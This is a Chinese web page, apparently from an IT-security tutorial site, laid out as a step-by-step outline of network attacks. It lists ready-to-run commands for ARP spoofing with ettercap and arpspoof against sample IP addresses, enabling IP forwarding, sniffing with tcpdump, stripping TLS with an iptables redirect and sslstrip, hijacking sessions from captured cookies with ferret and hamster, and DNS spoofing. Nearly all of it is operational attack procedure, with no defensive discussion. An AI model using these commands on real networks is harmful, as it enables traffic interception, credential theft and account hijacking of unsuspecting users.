频道栏目
首页 > 资讯 > Session劫持 > 正文

arp欺骗、嗅探、dns欺骗、session劫持

16-01-08        来源:[db:作者]  
收藏   我要投稿

会话劫持的实现手段

l  中间人攻击(arp欺骗,dns欺骗)
l  注射式攻击

Arp欺骗--ettercap

l  参数说明:http://www.91ri.org/4408.html
l  2.如果你是第一次进行中间人攻击操作,那么要对kali下的ettercap做点配置,配置文件是/etc/ettercap/etter.conf
首先你要将EC_UID 、EC_GID都变为0,然后找到LINUX分类下的IF YOU USE IPTABLES这一行,将注释(“#”号)去掉,打开转发。
3./etc/NetworkManager/NetworkManager.conf  修改
4.service network-manager restart

5.echo 1 >> /proc/sys/net/ipv4/ip_forward
6. ettercap -i wlan0 -Tq -M arp:remote /192.168.2.20/ /192.168.2.1/


Arp欺骗—arpspoof

l   echo 1 >> /proc/sys/net/ipv4/ip_forward
l   arpspoof -i eth0 -t 192.168.14.2 192.168.14.132

数据包捕获

l  tcpdump
l  wireshark
l  drafnet等其他自动化工具


Ssl数据嗅探

l  iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000(设置)
l  iptables -t nat -D PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000(取消)
l  sslstrip  -p -l 10000 -w log.txt

session劫持-arp欺骗

l  tcpdump -i eth0 -w qq.cap
l  ferret -r qq.cap
l  hamster
l  http://hamster
l  选择目标
l  测试session

64位下ferret 安装

l   dpkg --add-architecture i386
l   apt-get clean && apt-get update && apt-get upgrade -y && apt-get dist-upgrade -y
l   sudo aptitude install ferret-sidejack:i386
 

session劫持-DNS欺骗

l   1. 使用 ettercap 进行arp欺骗
l   2.修改etter.dns 文件
/etc/ettercap/etter.dns
l   3.启用dns_spoof
相关TAG标签
上一篇:关于session会话劫持+cookie劫持的一些事--ASP.NET防御
下一篇:Oracle中简单查询、限定查询、数据排序SQL语句范例和详细注解
相关文章
图文推荐

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站